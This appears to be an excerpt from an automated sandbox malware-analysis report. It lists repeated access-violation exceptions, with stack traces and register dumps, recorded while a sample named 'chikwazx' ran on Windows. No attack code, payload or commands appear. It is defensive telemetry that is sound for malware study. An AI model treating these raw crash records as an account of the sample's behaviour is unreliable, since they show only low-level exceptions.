__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
